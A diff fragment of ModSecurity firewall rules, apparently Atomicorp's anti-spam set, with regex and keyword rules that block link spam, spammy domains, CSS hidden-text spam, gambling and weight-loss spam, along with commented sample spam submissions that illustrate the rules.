"t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,id:300054,rev:6,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Possible Spam: Bad URL',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+# Rule 300036:
+#SecRule ARGS|!ARGS:/page_content/ "(?:[0-9]+(books|epson|fang|flower|tour)\.com|d+x?\.(?:fate\.se|aus\.cc|bilsay\.com|lov3\.net|plorp\.com|top\.tc|us\.to|a\.la|dnip\.net|ig3\.net|mercedesazcona\.com\.ar|mooo\.com|myserver\.org|static\.net|uk\.to|weedns\.com)|\.ltdcr\.(?:com|net|org|cn)|\.hkce\.(?:org|net)|\.cegcr\.(?:com|net)|\b51hc\.(?:com|net)|club[1-4]?\.blog-city\.com|wifi(?:-world|-planet|guide)\.org|(?:au-(?:feminin|masculin)|(?:casino|slots|car-?insurance).*)\.blogspot\.com|yahotels\.(?:net|eu)|gundam(?:wing|seed)\.de|\.more\.(?:at|by)|\.notrix\.(?:at|ch|de|net)|shurl\.(?:net|org)|tiny(?:click|link)\.com)/" #        "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,id:300036,rev:5,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Possible Spam: Spammy Domain detected',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+# Rule 300014:
+# needs more testing
+# /^([a-z0-9]([-a-z0-9]*[a-z0-9])?\\.)+((a[cdefgilmnoqrstuwxz]|aero|arpa)|(b[abdefghijmnorstvwyz]|biz)|(c[acdfghiklmnorsuvxyz]|cat|com|coop)|d[ejkmoz]|(e[ceghrstu]|edu)|f[ijkmor]|(g[abdefghilmnpqrstuwy]|gov)|h[kmnrtu]|(i[delmnoqrst]|info|int)|(j[emop]|jobs)|k[eghimnprwyz]|l[abcikrstuvy]|(m[acdghklmnopqrstuvwxyz]|mil|mobi|museum)|(n[acefgilopruz]|name|net)|(om|org)|(p[aefghklmnrstwy]|pro)|qa|r[eouw]|s[abcdeghijklmnortvyz]|(t[cdfghjklmnoprtvwz]|travel)|u[agkmsyz]|v[aceginu]|w[fs]|y[etu]|z[amw])$/
+#
+#SecRule REQUEST_URI "!(?:/imp/compose\.php|/node/(([0-9]+)/edit|add/news-story)|^/news/add$)" #        "capture,id:300014,rev:5,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Possible Spam: Possible Random Nonsensical URL detected',chain,logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+#SecRule REQUEST_HEADERS:Referer "!(?:/imp/login\.php)" chain
+#SecRule ARGS "http://(?:[a-z]*[x-z][a-z]*q[^u][a-z]*|[a-z]*q[^u][a-z]*[x-z][a-z]*).*\.[a-z]{2,}/"
+#
+#rjblhwqgarriawtjkubz, http://www.menopausetreatmentblog.com/ menopause symptoms, IkoLrvM, http://www.cankersoresinfo.com/ canker sore, gfsyaAM, http://www.yourinsomniablog.com/ sleep aid, qXNbhEE, http://www.yoursexualhealthblog.com/ Sexual Health, ITuZoif, http://www.bladder-cancer-info.com/ Bladder Cancer, DumMdUm, http://www.braininjuryinfoblog.com/ Traumatic Brain Injury, gHlyTzw, http://www.goutmatter.com/ Gout symptoms and treatment, XxBqkFf, http://www.crohnsdiseaseblog247.com/ crohns disease, sSNGXhk.
+SecRule ARGS|!ARGS:/html/|!ARGS:/css/|!ARGS:/ajax/|!ARGS:/template/|!ARGS:/code/|!ARGS:ban|!ARGS:/admin/|!ARGS:/sql/|!ARGS:/query/ "^[a-z]{16,} , < ?a href ?= \"? ?http://[a-z\.0-9/]+/  [a-z]+ [a-z]+, [a-z]{6,}, http://[a-z\.0-9/]+/ [a-z]+" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,id:300299,rev:3,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Possible Link Spam',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+#SecRule ARGS|!ARGS:/html/|!ARGS:/css/|!ARGS:/ajax/|!ARGS:/template/|!ARGS:/code/|!ARGS:ban|!ARGS:/admin/|!ARGS:/sql/|!ARGS:/query/ "^[a-z0-9]{4,32} ?, ?< ?a href ?= ?\" ?http://[a-z\.0-9/]+/.*> ?[a-z0-9]{4,32} ?.*< ?/ ?a ?> ?, ?[a-z0-9]{4,32} ?.*, ?< ?a href ?= ?\" ?http://[a-z\.0-9/]+/.*< ?/ ?a ?> ?, ?[a-z0-9]{4,32} ?, < ?a href ?= ?\" ?http://[a-z\.0-9/]+/.*< ?/ ?a ?> ?, [a-z0-9]{4,32} ?," #"phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,id:300300,rev:1,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Possible Link Spam',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+#Spamming wiki urls
+SecRule ARGS|!ARGS:/html/|!ARGS:/css/|!ARGS:email|!ARGS:/ajax/|!ARGS:/template/|!ARGS:/code/|!ARGS:/sql/|!ARGS:/query/ "\["         "id:333900,phase:2,t:none,t:urlDecodeUni,t:htmlEntityDecode,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:333723,t:none,pass,nolog,noauditlog,skipAfter:END_SPAMMY_URLS"
+
+#Rule 300079:
+SecRule ARGS|!ARGS:item_value|!ARGS:/domain/|!ARGS:/^utm_/|!ARGS:/new_messages/|!ARGS:utm_term|!ARGS:/bigdescription/|!ARGS:/orgname/|!ARGS:/query/|!ARGS:/ticket/|!ARGS:/navcat/|!ARGS:/banned/|!ARGS:offer_article|!ARGS:action_name|!ARGS:ban_user|!ARGS:short_story|!ARGS:UserData|!ARGS:/process_chats/|!ARGS:embed|!ARGS:tmpl|!ARGS:business|!ARGS:/milestone/|!ARGS:/product_name/|!ARGS:/AD_ITEM/|!ARGS:/drug/|!ARGS:/^payer_/|!ARGS:/billing/|!ARGS:/casetrack/|!ARGS:block|!ARGS:imapuser|!ARGS:ban|!ARGS:/department/|!ARGS:redirect_to|!ARGS:p_profile_pictures|!ARGS:return|!ARGS:setting[banemail]|!ARGS:/username/|!ARGS:oaparams|!ARGS:/password/|!ARGS:/user_name/|!ARGS:/page_content/|!ARGS:/search/|!ARGS:/url/|!ARGS:/saml/|!ARGS:/dnssearch/|!ARGS:file|!ARGS:/token/|!ARGS:homepage|!ARGS:mode|!ARGS:data[About][content]|!ARGS:data[Contact][content]|!ARGS:config|!ARGS:signature|!ARGS:/url/|!ARGS:/saml/|!ARGS:/dnssearch/|!ARGS:file|!ARGS:/token/|!ARGS:template|!ARGS:/header/|!ARGS:/footer/ "(?:\[ ?(url|link) ?= ?\"? ?https?://.*\[ ?(url|link) ?= ?\"? ?https?://.*\[ ?(url|link) ?= ?\"? ?https?://.*\[ ?(url|link) ?= ?\"? ?https?:/|(\[ ?(url|link) ?\]https?://.*\[ ?/ ?(url|link) ?\].*){4,})" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,id:300079,rev:18,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Possible Spam: Multiple embedded urls in argument (Disable if you wish to allow 4 or more URLs in a post)',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+#Multiple URLs in a wiki post
+SecRule ARGS|!ARGS:suffix|!ARGS:ban|!ARGS:oaparams|!ARGS:/password/|!ARGS:/user_name/|!ARGS:/search/|!ARGS:/url/|!ARGS:/saml/|!ARGS:/dnssearch/|!ARGS:file|!ARGS:/token/|!ARGS:homepage|!ARGS:mode|!ARGS:config|!ARGS:signature|!ARGS:/url/|!ARGS:/saml/|!ARGS:/dnssearch/|!ARGS:file|!ARGS:/token/|!ARGS:/template/|!ARGS:/header/|!ARGS:/footer/ "(\[ ?http://.*){4,}" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,id:300023,rev:1,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Possible Spam: Multiple embedded urls in argument (Disable if you wish to allow 4 or more URLs in a post)',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+#
+SecRule ARGS "(\[ ?url ?= ?\"? ?https?://.*\[ ?link ?= ?\"? ?https?://.*|\[ ?link ?= ?\"? ?https?://.*\[ ?url ?= ?\"? ?https?://)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,id:300182,rev:18,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Possible Spam: Mixed URL posting types - possible spam',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+#[url=http://example.com/foo/bar/+]junk[/url]+&location=USA&occupation=Real&interests=Religion,+spiritual&signature=[url=[url=http://www.example.com+]spam phrase[/url]+]another spam phrase[/url][url=[url=http://www.example.com]more spam phrases&#243;wek[/url]+]spam phrase[/url]
+SecRule ARGS "\[ ?url ?= ?\[ ?url ?= ?\"? ?https?://.*url ?\]" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,id:300282,rev:2,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Possible Spam: Broken URL posting type - possible spam',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+
+#>>>+Technical+Jobs+In+Spamland+<<<
+SecRule ARGS|!ARGS:/html/|!ARGS:/css/|!ARGS:email|!ARGS:/ajax/|!ARGS:/template/|!ARGS:/code/|!ARGS:/sql/|!ARGS:/query/ "\[ ?http://.*>>> ?[a-z0-9 -_.,\"\'\|]+ ?<<<.*\]" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,id:300302,rev:2,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Possible Spam Link',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+#Known wiki spam pattern
+#==<center>[http://example.com/stuff<big>'''<u>morestuff</u>'''</big>]</center>==
+SecRule ARGS|!ARGS:/css/|!ARGS:email|!ARGS:/ajax/|!ARGS:/template/|!ARGS:/code/|!ARGS:/sql/|!ARGS:/query/ "< ?center.*\[ ?http://.*big ?>.*'' ?[a-z0-9 -_.,\"\'\| ].*big.*\]" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,id:300313,rev:2,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Possible Spam Link',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+SecMarker END_SPAMMY_URLS
+
+
+#Spam signups
+SecRule REQUEST_URI "/ucp\.php" 	"phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,id:391100,rev:1,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Possible spammer signup for forum',chain,logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+SecRule ARGS:occupation "(?:^,,,,,|Здравоохранение|Реклама|пластика)"
+
+############ SPAMMER TRICKS ##############
+SecRule ARGS "@pm font height hidden auto width position absolute overflow style display px"         "id:353901,phase:2,t:none,t:urlDecodeUni,t:replaceComments,t:htmlEntityDecode,t:compressWhiteSpace,pass,nolog,noauditlog,skip:1"
+        SecAction "phase:2,id:333734,t:none,pass,nolog,noauditlog,skipAfter:END_HIDDEN_TEXT"
+
+SecRule ARGS:send_mail "^true$" "id:375111,rev:1,phase:2,t:none,t:urlDecodeUni,t:lowercase,skipAfter:END_HIDDEN_TEXT,nolog,noauditlog,pass"
+
+SecRule ARGS:text "^< ?\? ?php" "id:375141,rev:1,phase:2,t:none,t:lowercase,t:compressWhiteSpace,skipAfter:END_HIDDEN_TEXT,nolog,noauditlog,pass"
+
+
+#Rule 300056:  Hidden spam links
+#examples:
+#<font style=position:absolute;overflow:hidden;height:1px;width:1px;>
+#overflow:auto;width:0;height:0
+SecRule ARGS|!ARGS:field_id_2|!ARGS:/email/|!ARGS:/milestone/|!ARGS:/^admin/|!ARGS:/^jform/|!ARGS:/^Store_OUI_/|!ARGS:grid_html|!ARGS:/code/|!ARGS:/tt_content/|!ARGS:/domain/|!ARGS:/^utm_/|!ARGS:/new_messages/|!ARGS:utm_term|!ARGS:/bigdescription/|!ARGS:/orgname/|!ARGS:/query/|!ARGS:/ticket/|!ARGS:/navcat/|!ARGS:/banned/|!ARGS:offer_article|!ARGS:action_name|!ARGS:ban_user|!ARGS:short_story|!ARGS:UserData|!ARGS:/process_chats/|!ARGS:embed|!ARGS:/^we_/|!ARGS:tmpl|!ARGS:/^elements/|!ARGS:formData|!ARGS:business|!ARGS:/milestone/|!ARGS:/product_name/|!ARGS:/AD_ITEM/|!ARGS:/drug/|!ARGS:/^payer_/|!ARGS:/billing/|!ARGS:/casetrack/|!ARGS:block|!ARGS:imapuser|!ARGS:ban|!ARGS:/department/|!ARGS:redirect_to|!ARGS:p_profile_pictures|!ARGS:return|!ARGS:setting[banemail]|!ARGS:/username/|!ARGS:oaparams|!ARGS:/password/|!ARGS:/user_name/|!ARGS:/page_content/|!ARGS:/search/|!ARGS:/css/|!ARGS:/^widget-text/|!ARGS:/^header/|!ARGS:/^footer/|!ARGS:/^wpTextbox/|!ARGS:product_description|!ARGS:sitead|!ARGS:/template/|!ARGS:entire_file "<.{,200}style ?= ?(position ?\: ?absolute|overflow ?\: ?(?:hidden|auto)).{1,200} (?:height|width) ?(?:=|\:) ?[0-9] ?(px|\;)"         "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:300056,rev:7,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Possible Spam: Hidden Text Exploit',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+#Hidden wiki text using a negative pixel size
+#example
+#{CODE(ishtml="1")}<div class="dnn_dnnContent" style="margin-left: -1500px;"><a href="http://otimizacao-de-websites.com">otimização de sites</a> <a href="http://desentupidorasanehidro.com.br">desentupidora</a> <a href="http://www.graficavendahoje.com.br">grafica</a> <a href="http://www.deeplaser.com.br">clinica de estetica</a> <a href="http://asacompanhantessp.com.br">acompanhantes sao paulo</a> <a href="http://pactotransportes.com.br">transportadora</a> <a href="http://www.mtksistemas.com.br">relogio de ponto</a> <a href="http://www.dentistaespecialista.com.br">dentista</a></div>{CODE}
+#SecRule ARGS|!ARGS:/field_id_2/|!ARGS:search|!ARGS:/email/|!ARGS:/^admin/|!ARGS:/^jform/|!ARGS:entire_file|!ARGS:pdf|!ARGS:/code/|!ARGS:formData "(?:height|width) ?(?:=|\:) ?(?:\"|\')? ?-[0-9]+ ?(?:\"|\')? ?px ?;" SecRule ARGS|!ARGS:/field_id_2/|!ARGS:search|!ARGS:/email/|!ARGS:/^admin/|!ARGS:/^jform/|!ARGS:entire_file|!ARGS:pdf|!ARGS:grid_html|!ARGS:/tt_content/|!ARGS:/code/|!ARGS:optional_head|!ARGS:formData|!ARGS:/^we_/|!ARGS:/^elements/ "< ?div.{1,200}style=\-[0-9]+ ?px ?;.{1,200}< ?/ ?div ?>"         "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:300058,rev:7,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Possible Spam: Hidden Text Using Negative Pixel Size',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+# Rule 30076
+# This matches against height:0-4px (most CSS hidden spam) (regardless of whitespace on either side of the colon)
+# This matches against overflow:auto (regardless of whitespace on either side of the colon)
+SecRule ARGS|!ARGS:document|!ARGS:/field_id_2/|!ARGS:/milestone/|!ARGS:/^admin/|!ARGS:/email/|!ARGS:/^jform/|!ARGS:facebookiframe|!ARGS:editor|!ARGS:/tt_content/|!ARGS:objectToLike|!ARGS:grid_html|!ARGS:/previewdata/|!ARGS:optional_head|!ARGS:customized|!ARGS:/^grid_html$/!ARGS:/scrollstyle/|!ARGS:statichtml|!ARGS:/^elements/|!ARGS:/^we_/|!ARGS:html|!ARGS:formData|!ARGS:/code/|!ARGS:body_html|!ARGS:/^Store_OUI_/|!ARGS:_message|!ARGS:pdf|!ARGS:/img_style/|!ARGS:field_description|!ARGS:code|!ARGS:emailmessage|!ARGS:/domain/|!ARGS:/^utm_/|!ARGS:/new_messages/|!ARGS:utm_term|!ARGS:/bigdescription/|!ARGS:/orgname/|!ARGS:/query/|!ARGS:/ticket/|!ARGS:/navcat/|!ARGS:/banned/|!ARGS:offer_article|!ARGS:action_name|!ARGS:ban_user|!ARGS:short_story|!ARGS:UserData|!ARGS:/process_chats/|!ARGS:embed|!ARGS:tmpl|!ARGS:business|!ARGS:/milestone/|!ARGS:/product_name/|!ARGS:/AD_ITEM/|!ARGS:/drug/|!ARGS:/^payer_/|!ARGS:/billing/|!ARGS:/casetrack/|!ARGS:block|!ARGS:imapuser|!ARGS:ban|!ARGS:/^emtext/|!ARGS:htmlPreview|!ARGS:file_content|!ARGS:/department/|!ARGS:filecontent|!ARGS:redirect_to|!ARGS:p_profile_pictures|!ARGS:return|!ARGS:setting[banemail]|!ARGS:resumoDetalhe|!ARGS:/username/|!ARGS:oaparams|!ARGS:/password/|!ARGS:/user_name/|!ARGS:/page_content/|!ARGS:/search/|!ARGS:/css/|!ARGS:code|!ARGS:/^widget-text/|!ARGS:/^header/|!ARGS:/^footer/|!ARGS:/^wpTextbox/|!ARGS:product_description|!ARGS:sitead|!ARGS:/template/|!ARGS:entire_file "(?: (?:height|width) ?(?:=|\:) ?[0-9] ?px|overflow ?: ?(?:auto|hidden)|style ?= ?\"? ?display ?: ?none ?)"           "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:300076,rev:31,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Hidden Text Detected',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+SecMarker END_HIDDEN_TEXT
+
+#####SKIP ALL SPAM RULES BY KEYWORD#########
+#SecRule ARGS "@pmFromFile spam.data" #        "phase:2,t:none,t:urlDecodeUni,t:compressWhiteSpace,pass,nolog,noauditlog,skip:1"
+#        SecAction phase:2,pass,nolog,noauditlog,skipAfter:END_SPAM
+
+#skip spam rules for content about spam
+SecRule ARGS "@pm spamassassin qmail smapdyke postfix clamav clamd modsecurity mod_security ossec" "phase:2,id:333902,t:none,pass,nolog,noauditlog,skipAfter:END_SPAM"
+
+############ GAMBLING SPAM ##############
+SecRule ARGS "@pm casino poker roulette slot pacific hold texas royal bet"         "phase:2,t:none,t:urlDecodeUni,t:compressWhiteSpace,pass,id:333903,nolog,noauditlog,skip:1"
+        SecAction "phase:2,id:333735,t:none,pass,nolog,noauditlog,skipAfter:END_GAMBLING_SPAM"
+
+# Rule 300032:
+SecRule ARGS|!ARGS:/token/|!ARGS:/domain/|!ARGS:/^utm_/|!ARGS:/new_messages/|!ARGS:utm_term|!ARGS:/bigdescription/|!ARGS:/orgname/|!ARGS:/query/|!ARGS:/ticket/|!ARGS:/navcat/|!ARGS:/banned/|!ARGS:offer_article|!ARGS:action_name|!ARGS:ban_user|!ARGS:short_story|!ARGS:UserData|!ARGS:/process_chats/|!ARGS:embed|!ARGS:tmpl|!ARGS:business|!ARGS:/milestone/|!ARGS:/product_name/|!ARGS:/AD_ITEM/|!ARGS:/drug/|!ARGS:/^payer_/|!ARGS:/billing/|!ARGS:/casetrack/|!ARGS:block|!ARGS:imapuser|!ARGS:ban|!ARGS:/department/|!ARGS:redirect_to|!ARGS:p_profile_pictures|!ARGS:return|!ARGS:setting[banemail]|!ARGS:/username/|!ARGS:oaparams|!ARGS:/password/|!ARGS:/user_name/|!ARGS:/page_content/|!ARGS:/search/|!ARGS:/username/|!ARGS:oaparams|!ARGS:/password/|!ARGS:server_name|!ARGS:/filename/|!ARGS:/email/ "(?:pacific[ -_.,\"\'\|].{1,100}poker|[ -_.,\"\'\|].{1,100}casino[ -_.,\"\'\|]|slot[ -_.,\"\'\|].{1,100}machines|(?:random|free|internet)+[ -_.,\"\'\|].{1,100}slots|poker|casino[ -_.,\"\'\|](?:games|action)|bet(ting)?[ -_.,\"\'\|](?:at|on)[ -_.,\"\'\|](?:home|horse))"          "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,t:compressWhitespace,chain,id:300032,rev:11,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Gambling or Poker Content (Disable this rule if you wish to allow that content)',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+SecRule MATCHED_VAR "!(poker flat|casino royale|un casino di)"
+
+#SecRule ARGS|!ARGS:/domain/|!ARGS:/^utm_/|!ARGS:/new_messages/|!ARGS:utm_term|!ARGS:/bigdescription/|!ARGS:/orgname/|!ARGS:/query/|!ARGS:/ticket/|!ARGS:/navcat/|!ARGS:/banned/|!ARGS:offer_article|!ARGS:action_name|!ARGS:ban_user|!ARGS:short_story|!ARGS:UserData|!ARGS:/process_chats/|!ARGS:embed|!ARGS:tmpl|!ARGS:business|!ARGS:/milestone/|!ARGS:/product_name/|!ARGS:/AD_ITEM/|!ARGS:/drug/|!ARGS:/^payer_/|!ARGS:/billing/|!ARGS:/casetrack/|!ARGS:block|!ARGS:imapuser|!ARGS:ban|!ARGS:/department/|!ARGS:redirect_to|!ARGS:p_profile_pictures|!ARGS:return|!ARGS:setting[banemail]|!ARGS:/username/|!ARGS:oaparams|!ARGS:/password/|!ARGS:/user_name/|!ARGS:/page_content/|!ARGS:/search/|!ARGS:/username/|!ARGS:oaparams|!ARGS:/password/|!ARGS:server_name|!ARGS:/filename/|!ARGS:/email/ "!(poker flat|casino royale)"
+
+# Rule 300028:
+SecRule ARGS|!ARGS:/domain/|!ARGS:/token/|!ARGS:/^utm_/|!ARGS:/new_messages/|!ARGS:utm_term|!ARGS:/bigdescription/|!ARGS:/orgname/|!ARGS:/query/|!ARGS:/ticket/|!ARGS:/navcat/|!ARGS:/banned/|!ARGS:offer_article|!ARGS:action_name|!ARGS:ban_user|!ARGS:short_story|!ARGS:UserData|!ARGS:/process_chats/|!ARGS:embed|!ARGS:tmpl|!ARGS:business|!ARGS:/milestone/|!ARGS:/product_name/|!ARGS:/AD_ITEM/|!ARGS:/drug/|!ARGS:/^payer_/|!ARGS:/billing/|!ARGS:/casetrack/|!ARGS:block|!ARGS:imapuser|!ARGS:ban|!ARGS:/department/|!ARGS:redirect_to|!ARGS:p_profile_pictures|!ARGS:return|!ARGS:setting[banemail]|!ARGS:/username/|!ARGS:oaparams|!ARGS:/password/|!ARGS:/user_name/|!ARGS:/page_content/|!ARGS:/search/|!ARGS:/username/|!ARGS:oaparams|!ARGS:/password/|!ARGS:server_name|!ARGS:/filename/|!ARGS:/email/ "(?:texas[ -_.,\"\'\|].{1,100}hold[ -_.,\"\'\|]?em|texas[ -_.,\"\'\|]?hold[ -_.,\"\'\|]?em|casino[ -_.,\"\'\|]?online)"          "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,t:compressWhitespace,id:300028,rev:2,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Spam: Gambling',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+SecMarker END_GAMBLING_SPAM
+
+############ WEIGHT LOSS SPAM ############
+# Rule 300042:
+SecRule ARGS "@pm weight loss"         "id:353904,phase:2,t:none,t:urlDecodeUni,t:compressWhiteSpace,pass,nolog,noauditlog,skip:1"
+        SecAction "phase:2,id:333736,t:none,pass,nolog,noauditlog,skipAfter:END_WEIGHTLOSS_SPAM"
+
+SecRule ARGS|!ARGS:/domain/|!ARGS:/^utm_/|!ARGS:/new_messages/|!ARGS:utm_term|!ARGS:/bigdescription/|!ARGS:/orgname/|!ARGS:/query/|!ARGS:/ticket/|!ARGS:/navcat/|!ARGS:/banned/|!ARGS:offer_article|!ARGS:action_name|!ARGS:ban_user|!ARGS:short_story|!ARGS:UserData|!ARGS:/process_chats/|!ARGS:embed|!ARGS:tmpl|!ARGS:business|!ARGS:/milestone/|!ARGS:/product_name/|!ARGS:/AD_ITEM/|!ARGS:/drug/|!ARGS:/^payer_/|!ARGS:/billing/|!ARGS:/casetrack/|!ARGS:block|!ARGS:imapuser|!ARGS:ban|!ARGS:/department/|!ARGS:redirect_to|!ARGS:p_profile_pictures|!ARGS:return|!ARGS:setting[banemail]|!ARGS:/username/|!ARGS:oaparams|!ARGS:/password/|!ARGS:/user_name/|!ARGS:/page_content/|!ARGS:/search/|!ARGS:username|!ARGS:server_name|!ARGS:/filename/|!ARGS:/email/ "(?:lose[ -_.,\"\'\|]?weight[ -_.,\"\'\|]?quick|weight[ -_.,\"\'\|]?loss[ -_.,\"\'\|]?pills?|(?:rapid|quick)[ -_.,\"\'\|]?weight[ -_.,\"\'\|]?loss)"          "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,t:compressWhitespace,id:300042,rev:4,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Possible Spam: Weight Loss',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+SecMarker END_WEIGHTLOSS_SPAM
+############ GENERIC SPAM ################
+SecRule ARGS "@pm bulk sysco jagk knloony cam sysrem lemon exit defunct commie andrew music miccel rooo rowdd colkk fortune magazine finder netfirms rolex z0rder fargo weight virility pills squirrel online lezaquin golden mortgage pill hyphen force fast laser fuel cheap phone hontak lasik huojia jinx telemati diamond horo oa274 star exicornt afmbb. cragrats. brook stars eblija liuhecai szilva96 insurance star exicornt afmbb. cragrats. brook stars eblija liuhecai szilva96 insurance loan follow tprehj license ushummingirds credit divorce forever video ganzaoji geurtstagskarten imwithoy liuhecai pharm myzenegra netftplya netguy degree oyoulders payday sonnerie calculator"         "phase:2,pass,t:none,t:urlDecodeUni,pass,id:363905,nolog,noauditlog,skip:1"
+        SecAction "phase:2,id:333737,t:none,pass,nolog,noauditlog,skipAfter:END_GENERIC_SPAM"
+
+# Rule 300051:
+SecRule ARGS|!ARGS:/dnssearch/|!ARGS:/pf.pass/|!ARGS:/pf.user/|!ARGS:/domain/|!ARGS:/^utm_/|!ARGS:/new_messages/|!ARGS:utm_term|!ARGS:/bigdescription/|!ARGS:/orgname/|!ARGS:/query/|!ARGS:/ticket/|!ARGS:/navcat/|!ARGS:/banned/|!ARGS:offer_article|!ARGS:action_name|!ARGS:ban_user|!ARGS:short_story|!ARGS:UserData|!ARGS:/process_chats/|!ARGS:embed|!ARGS:tmpl|!ARGS:business|!ARGS:/milestone/|!ARGS:/product_name/|!ARGS:/AD_ITEM/|!ARGS:/drug/|!ARGS:/^payer_/|!ARGS:/billing/|!ARGS:/casetrack/|!ARGS:block|!ARGS:imapuser|!ARGS:ban|!ARGS:/department/|!ARGS:redirect_to|!ARGS:p_profile_pictures|!ARGS:return|!ARGS:setting[banemail]|!ARGS:/username/|!ARGS:oaparams|!ARGS:/password/|!ARGS:/user_name/|!ARGS:/page_content/ "(?:magazine[ -_.,\"\'\|]?(?:finder|netfirms)|rolex[ -_.,\"\'\|]|z0rder|well-fargo|phvonline|weight-watcher|virility[ -_.,\"\'\|]pills|squirrelht|sams-club-online|nexium-online|levaquin-500|golden-coins|gmac-mortgage-corp|enlarge(ment)?pill|crestor[ -_.,\"\'\|]online|3hyphens|forcedvid|fastpayd|spycam|laser[ -_.,\"\'\|]?eye|eye[ -_.,\"\'\|]?laser|fuelcellmarket|fuel-dispenser|fueling-dispenser|cheapest[ -_.,\"\'\|]?i?phone|kontaktlinsen|lasikclinic|huojia|jinxinghj|telemati[ck]sone|a-mortgage|diamondabrasives|-horoskop|oa274|exicornt|afmbb\.|cragrats\.|reuterbrook|lazy-stars|szilva96|(?:mortgage|home loan) calculator|fast loan)"          "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,t:compressWhitespace,id:300051,rev:10,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Possible Spam: General',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+
+# Rule 300009:
